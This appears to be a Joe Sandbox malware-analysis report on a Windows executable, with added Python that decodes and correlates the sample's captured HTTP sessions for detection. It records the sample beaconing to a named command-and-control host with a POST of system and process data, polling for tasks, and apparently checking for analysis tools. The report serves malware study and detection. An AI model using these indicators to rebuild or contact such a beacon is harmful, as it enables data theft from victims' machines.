                                 2024-12-31 08:44:10 UTC | 224 | IN | HTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 08:44:10 GMT
                                Content-Type: application/json
                                Content-Length: 31
                                Connection: close
                                Server: gunicorn/19.9.0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: true
                                 2024-12-31 08:44:10 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                Data Ascii: { "origin": "8.46.123.189"}
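The four sessions above form one exchange: the sample first asks httpbin.org/ip for its public address over TLS, then POSTs a JSON host profile to home.fortth14vs.top that repeats that address alongside CPU and RAM counts, drive sizes, display resolution, a recent-files count and the full process list (the 560612-byte body is why the first session is split into so many OUT chunks); it then polls the same path with ?argument=0 for tasking and POSTs a "Done1" result, both of which the nginx front end answers with 404. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it decodes the "Data Raw" hex prefix of session 0 back to the JSON shown in "Data Ascii", rebuilds the four transactions as constructed in-memory records (the profile body is shortened because the report truncates it; the Content-Length value is the one the report shows), and correlates them the way a detection would, flagging the httpbin-learned IP echoed into the upload, the path shape, the absent User-Agent, and whether the tasking channel returned anything other than 404. The labels profile_upload, task_poll and task_result are this example's own names, not the malware's.

```python
"""Parse and correlate the HTTP sessions recorded above (added example, not report code)."""
import json
import re
from dataclasses import dataclass

# Hex prefix of the first POST body, copied from the "Data Raw" line of session 0.
DATA_RAW_PREFIX = (
    "7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 "
    "22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 "
    "36 35 32 39 31 34 33 33 35 34 34 39 22 2c"
)
C2_HOST = "home.fortth14vs.top"
# 20 letters followed by 10 digits, as in /gduZhxVRrNSTmMahdBGb1735537738 (shape assumed
# from this one sample; other builds may use a different path).
C2_PATH_SHAPE = re.compile(r"^/[A-Za-z]{20}\d{10}(\?argument=\d+)?$")


def decode_data_raw(hex_dump: str) -> str:
    """Turn a 'Data Raw' hex dump back into text; latin-1 keeps every byte value."""
    return bytes.fromhex(hex_dump.replace(" ", "")).decode("latin-1")


@dataclass
class HttpTx:
    host: str
    method: str
    path: str
    headers: dict       # request headers as recorded
    body: str           # request body
    status: int         # response status code
    resp_body: str = ""


# Constructed copies of the four sessions above. PROFILE_BODY is a shortened stand-in
# with the same top-level keys (the report truncates the real body); the Content-Length
# header keeps the value the report shows for the real upload.
PROFILE_BODY = json.dumps({
    "ip": "8.46.123.189", "current_time": "8598217652914335449",
    "Num_processor": 4, "Num_ram": 7,
    "drivers": [{"name": "C:\\", "all": 223.0, "free": 168.0}],
    "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50,
    "processes": [{"name": "[System Process]", "pid": 0}, {"name": "System", "pid": 4}],
})
TRANSACTIONS = [
    HttpTx("httpbin.org", "GET", "/ip", {"Accept": "*/*"}, "", 200,
           '{\n  "origin": "8.46.123.189"\n}\n'),
    HttpTx(C2_HOST, "POST", "/gduZhxVRrNSTmMahdBGb1735537738",
           {"Accept": "*/*", "Content-Type": "application/json", "Content-Length": "560612"},
           PROFILE_BODY, 200, "0"),
    HttpTx(C2_HOST, "GET", "/gduZhxVRrNSTmMahdBGb1735537738?argument=0",
           {"Accept": "*/*"}, "", 404),
    HttpTx(C2_HOST, "POST", "/gduZhxVRrNSTmMahdBGb1735537738",
           {"Accept": "*/*", "Content-Type": "application/json", "Content-Length": "31"},
           '{ "id1": "0", "data": "Done1" }', 404),
]


def classify(tx: HttpTx) -> str:
    """Label one transaction by the role it plays in the observed exchange."""
    if tx.host == "httpbin.org" and tx.path == "/ip":
        return "egress_ip_lookup"
    if tx.host != C2_HOST:
        return "other"
    if tx.method == "GET" and "?argument=" in tx.path:
        return "task_poll"
    if tx.method == "POST":
        try:
            body = json.loads(tx.body)
        except ValueError:
            return "unknown_post"
        if {"ip", "processes", "recent_files"} <= set(body):
            return "profile_upload"
        if set(body) == {"id1", "data"}:
            return "task_result"
    return "unknown_post"


def analyze(txs: list) -> dict:
    """Correlate the sessions: does the host echo its httpbin-learned public IP to the C2?"""
    labels = [classify(t) for t in txs]
    c2 = [t for t in txs if t.host == C2_HOST]
    findings = {
        "sequence": labels,
        "uri_shape_match": all(C2_PATH_SHAPE.match(t.path) for t in c2),
        "missing_user_agent": all("User-Agent" not in t.headers for t in c2),
        # A 2xx on poll/result would mean the task channel is live; in the report both are 404.
        "task_channel_live": any(lab in ("task_poll", "task_result") and t.status < 300
                                 for t, lab in zip(txs, labels)),
    }
    origin = None
    for t, lab in zip(txs, labels):
        if lab == "egress_ip_lookup" and t.status == 200:
            origin = json.loads(t.resp_body).get("origin")
        elif lab == "profile_upload":
            profile = json.loads(t.body)
            findings["public_ip_echo"] = origin is not None and profile.get("ip") == origin
            findings["process_count"] = len(profile.get("processes", []))
            findings["oversized_json_post"] = int(t.headers.get("Content-Length", 0)) > 100_000
    return findings


if __name__ == "__main__":
    print(decode_data_raw(DATA_RAW_PREFIX))
    print(json.dumps(analyze(TRANSACTIONS), indent=2))
```

The public_ip_echo correlation is the check worth keeping: a GET to httpbin.org/ip immediately followed by a JSON POST whose "ip" field equals the returned origin is a much stronger indicator than either request alone, since the httpbin lookup is benign by itself. The task_channel_live flag stays false for this run because both the poll and the result report drew 404s, so nothing in the capture shows what a served task would look like.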



                                Target ID:5
                                Start time:03:44:07
                                Start date:31/12/2024
                                Path:C:\Users\user\Desktop\ZN34wF8WI2.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\ZN34wF8WI2.exe"
                                Imagebase:0x410000
                                File size:4'464'640 bytes
                                MD5 hash:E08249E8FC2ED51351908219F021FB0E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:2.6%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:14.6%
                                  Total number of Nodes:569
                                  Total number of Limit Nodes:92
                                  [Execution graph: the node/edge dump of the call graph is not reproduced here. Windows API calls that appear as graph nodes: WSAStartup, socket, connect, send, recv, recvfrom, select, WSAIoctl, ioctlsocket, setsockopt, getsockname, gethostname, closesocket, WSACloseEvent, SleepEx, RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExA, RegCloseKey, and the CRT function _open.]
72180->72179 72181 413046 RegOpenKeyExA 72180->72181 72183 41313b RegCloseKey 72180->72183 72181->72180 72182 413089 RegQueryValueExA 72181->72182 72182->72180 72182->72183 72183->72180 72184 4131d7 72185 4131f4 72184->72185 72186 413200 72185->72186 72190 413223 72185->72190 72191 4115b0 _lock 72186->72191 72188 41321e 72189 4132dc CloseHandle 72189->72188 72190->72189 72191->72188 72482 421139 72498 44baa0 72482->72498 72484 421148 72485 421512 72484->72485 72488 421161 72484->72488 72490 421527 72485->72490 72502 41fec0 WSACloseEvent select closesocket _open 72485->72502 72486 420f00 72493 420150 _open 72486->72493 72494 4175a0 _open 72486->72494 72496 420f7b 72486->72496 72504 44d4d0 closesocket _open 72486->72504 72505 424940 _open 72486->72505 72506 423900 _open 72486->72506 72488->72486 72489 420150 _open 72488->72489 72489->72486 72490->72486 72503 4222d0 WSACloseEvent select closesocket _open 72490->72503 72493->72486 72494->72486 72499 44bb60 72498->72499 72501 44bac7 72498->72501 72499->72484 72501->72499 72507 4305b0 _open 72501->72507 72502->72490 72503->72486 72504->72486 72505->72486 72506->72486 72507->72499 72192 41255d 72193 799f70 72192->72193 72194 41256c GetSystemInfo 72193->72194 72195 412589 72194->72195 72196 4125a0 GlobalMemoryStatusEx 72195->72196 72203 4125ec 72196->72203 72197 41263c GetDriveTypeA 72199 412655 GetDiskFreeSpaceExA 72197->72199 72197->72203 72198 412762 72200 4127d6 KiUserCallbackDispatcher 72198->72200 72199->72203 72201 4127f8 72200->72201 72202 412842 SHGetKnownFolderPath 72201->72202 72204 4128c3 72202->72204 72203->72197 72203->72198 72205 4128d9 FindFirstFileW 72204->72205 72206 412906 FindNextFileW 72205->72206 72207 412928 72205->72207 72206->72206 72206->72207 72508 8dfa30 72525 79dd50 72508->72525 72510 8dfa5a 72511 8dfa66 72510->72511 72512 798f70 _open 72510->72512 72513 8dfa6f 72512->72513 72528 7a12c0 72513->72528 72516 8dfaa6 72517 798f70 _open 72518 8dfaaf 72517->72518 72519 8dfb50 72518->72519 72521 8dfb06 
72518->72521 72532 79b500 _lock 72519->72532 72520 8dfb44 72521->72520 72533 79b500 _lock 72521->72533 72523 8dfb79 72534 7a7430 72525->72534 72527 79dd61 72527->72510 72529 7a12cc 72528->72529 72538 79e050 72529->72538 72531 7a12fa 72531->72516 72531->72517 72532->72523 72533->72523 72535 7a7444 72534->72535 72536 7a7458 72535->72536 72537 7a747c _lock 72535->72537 72536->72527 72537->72527 72539 79e503 72538->72539 72547 79e09d 72538->72547 72542 79e243 72539->72542 72543 79e1a6 72539->72543 72545 7a0250 ungetc 72539->72545 72546 7a11a4 ungetc 72539->72546 72549 7a08d7 ungetc 72539->72549 72550 7a0006 ungetc 72539->72550 72551 7a0e3e ungetc 72539->72551 72540 79e18e 72540->72543 72544 79ed90 ungetc 72540->72544 72541 79e388 72541->72539 72541->72541 72541->72543 72552 7a00b8 ungetc 72541->72552 72542->72543 72548 7a0742 ungetc 72542->72548 72543->72531 72544->72543 72545->72539 72546->72539 72547->72539 72547->72540 72547->72541 72547->72542 72547->72543 72548->72543 72549->72539 72550->72539 72551->72539 72552->72541 72553 4129ff FindFirstFileA 72554 412a31 72553->72554 72555 412a5c RegOpenKeyExA 72554->72555 72556 412a93 72555->72556 72557 412ade CharUpperA 72556->72557 72559 412b0a 72557->72559 72558 412bf9 QueryFullProcessImageNameA 72560 412c3b CloseHandle 72558->72560 72559->72558 72562 412c64 72560->72562 72561 412df1 CloseHandle 72563 412e23 72561->72563 72562->72561 72208 413d5e 72209 413d30 72208->72209 72209->72208 72210 413d90 72209->72210 72214 420ab0 72209->72214 72217 41fcb0 WSACloseEvent select closesocket _open 72210->72217 72213 413dc1 72218 4205b0 72214->72218 72217->72213 72219 4205bd 72218->72219 72222 4207c7 72218->72222 72219->72222 72225 42066a 72219->72225 72231 4207ce 72219->72231 72235 4203c0 _open 72219->72235 72236 427450 _open 72219->72236 72222->72209 72228 4206f0 72225->72228 72225->72231 72237 4273b0 _open 72225->72237 72226 420707 WSAEventSelect 72226->72228 72226->72231 72227 4207ef 72227->72231 72234 420847 72227->72234 72239 
426fa0 72227->72239 72228->72226 72228->72227 72230 4176a0 2 API calls 72228->72230 72230->72228 72238 427380 _open 72231->72238 72232 4209e8 WSAEnumNetworkEvents 72233 4209d0 WSAEventSelect 72232->72233 72232->72234 72233->72232 72233->72234 72234->72231 72234->72232 72234->72233 72235->72219 72236->72219 72237->72225 72238->72222 72240 426fd4 72239->72240 72242 426feb 72239->72242 72241 427207 select 72240->72241 72240->72242 72241->72242 72242->72234
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                  These format strings and the connect.c file name are libcurl's lib/connect.c connection-attempt ("eyeballer") debug messages, so the socket handling in this region of the image is statically linked libcurl code rather than networking code written for the sample; the imports it reaches (connect, select, setsockopt, closesocket) are the library's own.
                                  • API String ID: 0-1590685507
                                  • Opcode ID: be826686751033df7c862ae39f12eed930f2ceda0ff19e9f282974445a119e06
                                  • Instruction ID: 7f5322daf576eff9cbb1d53aa87a4653d851604589cc3f59ca006e9235c25ee7
                                  • Opcode Fuzzy Hash: be826686751033df7c862ae39f12eed930f2ceda0ff19e9f282974445a119e06
                                  • Instruction Fuzzy Hash: 0BC29F31A043449FE714CF29C484B6BB7E1BF84314F05866EEC989B392D779E989CB85

                                  Control-flow Graph

                                  APIs
                                  • GetSystemInfo.KERNELBASE ref: 00412579
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 004125CC
                                  • GetDriveTypeA.KERNELBASE ref: 00412647
                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 0041267E
                                  • KiUserCallbackDispatcher.NTDLL ref: 004127E2
                                  • SHGetKnownFolderPath.SHELL32 ref: 0041286D
                                  • FindFirstFileW.KERNELBASE ref: 004128F8
                                  • FindNextFileW.KERNELBASE ref: 0041291F
                                  Strings
                                  Memory Dump Source / Joe Sandbox IDA Plugin: same source dumps and snapshot file as listed in the first function record above.
                                  Similarity
                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                  • String ID: ;%A$@$`
                                  • API String ID: 2066228396-288790489
                                  • Opcode ID: 928609d3a233641c2fd607318e2958a7da4d733faa314ae4d0dec2888ae28278
                                  • Instruction ID: 8eb0867bef24a09d1750426a2bef6af7741b7bd6d56d34d458d6648663e1ce6c
                                  • Opcode Fuzzy Hash: 928609d3a233641c2fd607318e2958a7da4d733faa314ae4d0dec2888ae28278
                                  • Instruction Fuzzy Hash: 85D1C4B49043499FCB10EFA9C58969EBBF0FF49344F008969E898D7351E7749A84CF52

                                  Control-flow Graph

                                  Control-flow graph for the function at 4129ff (basic-block edge list, rendered as a graph on the original page; the Executed / Not Executed colouring is not recoverable from the text). Block sequence: FindFirstFileA (4129ff) → RegOpenKeyExA (412a3d-412a91) → CharUpperA (412a9f-412b0c) → loop 412b94-412bca (call 798e68) → QueryFullProcessImageNameA, CloseHandle (412bcc-412c66) → loop 412cef-412dc9 → CloseHandle (412dcf-412e1c) → exit blocks 412e3c-412f16. Every API call is preceded by calls to 8e1e50 and 8e1ee0.
                                  APIs
                                  Strings
                                  Memory Dump Source / Joe Sandbox IDA Plugin: same source dumps and snapshot file as listed in the first function record above.
                                  Similarity
                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                  • String ID: 0
                                  CharUpperA followed by QueryFullProcessImageNameA and a CloseHandle per iteration is the shape of a case-insensitive comparison of running-process image names against a list, which is most often a check for analysis tools by process name; the loop around QueryFullProcessImageNameA is the place to break on when debugging the sample.
                                  • API String ID: 2406880114-4108050209
                                  • Opcode ID: 8f47dcbdc3b998ff7600f21fa8b8e3e81e9c22f90ba79658bdb2e7067dfb9356
                                  • Instruction ID: 941f4821e55578bcd52d49abb4b75b550e1cb2c5e4f55e76543c84a20cc79a35
                                  • Opcode Fuzzy Hash: 8f47dcbdc3b998ff7600f21fa8b8e3e81e9c22f90ba79658bdb2e7067dfb9356
                                  • Instruction Fuzzy Hash: 50E1D9B09053099FCB50EF68D9856AEBBF4EF44344F50886AE988D7350EB78D994CF42

                                  Control-flow Graph

                                  Control-flow graph for the function at 4205b0 (basic-block edge list, rendered as a graph on the original page; the Executed / Not Executed colouring is not recoverable from the text). The function calls the internal helpers 427350, 4170b0, 4170d0, 4170e0, 4203c0, 427450, 44dec0, 427380, 4273b0, 423000, 426fa0, 422f10, 426df0 and 4176a0; WSAEventSelect is reached at 420707, and the blocks 4209d0-420a03 form a loop of WSAEventSelect with a zero event mask followed by WSAEnumNetworkEvents.
                                  APIs
                                  • WSAEventSelect.WS2_32(?,?,?), ref: 00420711
                                  • WSAEventSelect.WS2_32(?,?,00000000), ref: 004209DC
                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004209FC
                                  Strings
                                  Memory Dump Source / Joe Sandbox IDA Plugin: same source dumps and snapshot file as listed in the first function record above.
                                  Similarity
                                  • API ID: EventSelect$EnumEventsNetwork
                                  • String ID: N=A$multi.c
                                  multi.c together with WSAEventSelect and WSAEnumNetworkEvents matches the Winsock socket-wait path in libcurl's lib/multi.c (the event-based wait behind curl_multi_wait / curl_multi_poll), so this function is library code, not sample-specific logic.
                                  • API String ID: 2170980988-1472865492
                                  • Opcode ID: f3f99bd46820f3c5d84d907e25df5ea4cffaf5ada571fe2e42df7c5ccc88e08b
                                  • Instruction ID: 6e4ce9240adf1426a00906f67b4002a3b808652f910f8282f3f8f6e8c5cf06c8
                                  • Opcode Fuzzy Hash: f3f99bd46820f3c5d84d907e25df5ea4cffaf5ada571fe2e42df7c5ccc88e08b
                                  • Instruction Fuzzy Hash: F7D1CF717083019FE710DF64E881BABB7E5FF94348F84482EF98586242E778E945CB5A

                                  Control-flow Graph

                                  Control-flow graph for the function at 4db180 (basic-block edge list, rendered as a graph on the original page; the Executed / Not Executed colouring is not recoverable from the text). getsockname is reached at 4db2a9 after a call to 4daf30 and is followed by a call to 4db020; the function also calls 4db060 and 798b00 and, in its tail (4db3e8-4db589), the helpers 4db590, 4db660, 4db770 and 4db870 several times each.
                                  APIs
                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 004DB2B7
                                  Strings
                                  Memory Dump Source / Joe Sandbox IDA Plugin: same source dumps and snapshot file as listed in the first function record above.
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                  • API String ID: 3358416759-2430778319
                                  • Opcode ID: 053486b79859b049cde0b2b24eb9c35701305ae1ecce6bfc5fa6d0470fe7c8cb
                                  • Instruction ID: 1ac805cb591f05e9abf6a6a4ff6e4494cdd102a42189ca22c904ce2e4b95e9f7
                                  • Opcode Fuzzy Hash: 053486b79859b049cde0b2b24eb9c35701305ae1ecce6bfc5fa6d0470fe7c8cb
                                  • Instruction Fuzzy Hash: E5C17D31604205DFD718DF25C8A4A6A77E1EF89304F06896FE8898B3A1DB38ED45CBC5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ab34b7908defb24eb00f072905c486faebfa00acb1a07dc16362ca3ce990bf0
                                  • Instruction ID: 76e3b8fa2f2df8b5f33a1c5823e5acaa27c900ae345937c77f076a97395207e2
                                  • Opcode Fuzzy Hash: 1ab34b7908defb24eb00f072905c486faebfa00acb1a07dc16362ca3ce990bf0
                                  • Instruction Fuzzy Hash: 1E91253070D3698BD7358A28A8907BB72D5FFC0360F948B2EE898432D4EB789C51D695
                                  APIs
                                  • recv.WS2_32(000000FF,004C6F4E,000000FF,00000000,00000000,000000FF,004C6F4E,000000FF,?,00000000,?), ref: 004DA8B0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: f639e02f5d8b0293d088b36822403739fae1a24a3c89de9e1d75654e0afa5a83
                                  • Instruction ID: 7ab96e13ed1139ff0bfa1f54910113aee711ae1df87c40c5f9a2ad19b213132b
                                  • Opcode Fuzzy Hash: f639e02f5d8b0293d088b36822403739fae1a24a3c89de9e1d75654e0afa5a83
                                  • Instruction Fuzzy Hash: 4AF03072B057217FD5249A18EC55FABF369EFC4B20F14891AB944673488360BC5186E6
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004CAA19
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004CAA4C
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 004CAA97
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004CAAE9
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004CAB30
                                  • RegCloseKey.KERNELBASE(?), ref: 004CAB6A
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 004CAB82
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 004CAC46
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 004CAD0A
                                  • RegEnumKeyExA.KERNELBASE ref: 004CAD8D
                                  • RegCloseKey.KERNELBASE(?), ref: 004CADD9
                                  • RegEnumKeyExA.KERNELBASE ref: 004CAE08
                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 004CAE2A
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004CAE54
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004CAF63
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004CAFB2
                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 004CB072
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: QueryValue$Open$CloseEnum
                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                  • API String ID: 4217438148-1047472027
                                  • Opcode ID: 003668f24d1aae51902982bcdb694ff895724796f2e25593fabb7bfbe52869fb
                                  • Instruction ID: aa7415ec869a6998624071d082a5b19a9f05733cfd475ac3344a119fa9d3036c
                                  • Opcode Fuzzy Hash: 003668f24d1aae51902982bcdb694ff895724796f2e25593fabb7bfbe52869fb
                                  • Instruction Fuzzy Hash: 3172EFB5604301ABE710DB24CC82F6B77E8AF85708F18482DF985D7291E779E914CB67
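                                  The registry function above reads the Windows DNS client configuration (SearchList, Domain, DhcpDomain under Tcpip\Parameters and its per-interface subkeys, plus the DNSClient policy keys), and the surrounding records show WinSock calls and the source-file names "cf-socket.c" (libcurl's socket connection filter) and "ares__sortaddrinfo.c" together with the CARES_HOSTS variable (the c-ares resolver, which is also what reads DatabasePath to locate the hosts file). The Python below is an editorial triage helper added to this page; it is not part of the Joe Sandbox report or its IDA plugin. It parses "APIs" and "Strings" bullet lines in exactly the shape shown in these records (the sample lines are copied from this page and embedded as constructed input), maps the HKEY handle constants to hive names, and summarises which modules are called, which registry keys and value names are read, and which C source-file names leaked into the binary. The line regexes and the hive table are the author's own assumptions about the report format, not an official Joe Sandbox schema.

```python
"""Triage helper: summarise Joe Sandbox "APIs" / "Strings" bullet lines.

Added example, not part of the Joe Sandbox report.  The regexes below encode
an assumption about the report's line format; adjust them if your export differs.
"""
import re
from collections import defaultdict

# Predefined HKEY handle values (documented Windows constants); RegOpenKeyExA
# receives one of these as its first argument when opening a top-level hive.
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}

# "• api.MODULE(args), ref: ADDR" -- the argument list is optional, e.g.
# "RegEnumKeyExA.KERNELBASE ref: 004CAD8D" carries none.
API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# "• some string, xrefs: ADDR, ADDR" -- the string itself may contain commas,
# so the greedy group stops at the last ", xrefs:".
STR_RE = re.compile(r"^•\s*(?P<text>.*), xrefs?:\s*(?P<refs>.*)$")

# Constructed sample: lines copied from the function records on this page.
SAMPLE_LINES = r"""
• getsockname.WS2_32(-00000020,-00000020,?), ref: 004DB2B7
• recv.WS2_32(000000FF,004C6F4E,000000FF,00000000,00000000,000000FF,004C6F4E,000000FF,?,00000000,?), ref: 004DA8B0
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004CAA19
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004CAA4C
• RegEnumKeyExA.KERNELBASE ref: 004CAD8D
• RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 004D9974
• setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0044A831
• connect.WS2_32(?,?,00000001), ref: 00448C30
• SleepEx.KERNELBASE(00000000,00000000), ref: 00448CF3
• Could not set TCP_NODELAY: %s, xrefs: 0044A871
• cf-socket.c, xrefs: 0044A5CD, 0044A735
"""


def parse_api(line):
    """Return {'api', 'module', 'args', 'ref'} for an API bullet line, else None."""
    m = API_RE.match(line.strip())
    if m is None:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": args.split(",") if args else [],
        "ref": int(m.group("ref"), 16),
    }


def parse_string(line):
    """Return {'text', 'xrefs'} for a Strings bullet line, else None."""
    m = STR_RE.match(line.strip())
    if m is None:
        return None
    refs = [int(r, 16) for r in re.findall(r"[0-9A-Fa-f]{8}", m.group("refs"))]
    return {"text": m.group("text"), "xrefs": refs}


def summarize(text):
    """Group API calls by module and pull out registry keys, value names and
    C source-file names from a block of report lines."""
    calls_by_module = defaultdict(list)
    registry_keys, registry_values, source_files = [], [], []
    for line in text.splitlines():
        call = parse_api(line)
        if call is not None:
            calls_by_module[call["module"]].append(call["api"])
            args = call["args"]
            # RegOpenKeyEx(hKey, lpSubKey, ...): resolve the hive handle to a name.
            if call["api"].startswith("RegOpenKeyEx") and len(args) >= 2:
                registry_keys.append(HIVES.get(args[0], args[0]) + "\\" + args[1])
            # RegQueryValueEx(hKey, lpValueName, ...): the value name is argument 2.
            elif call["api"].startswith("RegQueryValueEx") and len(args) >= 2:
                registry_values.append(args[1])
            continue
        s = parse_string(line)
        # A bare "<name>.c" string is a compiled-in source path: a library fingerprint.
        if s is not None and re.fullmatch(r"[\w\-]+\.c", s["text"]):
            source_files.append(s["text"])
    return {
        "calls_by_module": dict(calls_by_module),
        "registry_keys": registry_keys,
        "registry_values": registry_values,
        "source_files": source_files,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

                                  Running the helper over the records on this page groups the WinSock calls (getsockname, recv, setsockopt, connect) apart from the KERNELBASE registry calls, lists the Tcpip\Parameters key and the SearchList / DatabasePath value names, and reports cf-socket.c as the only source-file string in the sample, which is the quickest way to confirm that the network code is a statically linked HTTP library rather than something written for this sample.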
                                  APIs
                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0044A831
                                  Strings
                                  • Trying [%s]:%d..., xrefs: 0044A689
                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0044A6CE
                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 0044AE1F
                                  • Trying %s:%d..., xrefs: 0044A7C2, 0044A7DE
                                  • Local port: %hu, xrefs: 0044AF28
                                  • Local Interface %s is ip %s using address family %i, xrefs: 0044AE60
                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 0044ADAC
                                  • @, xrefs: 0044A8F4
                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0044AD0A
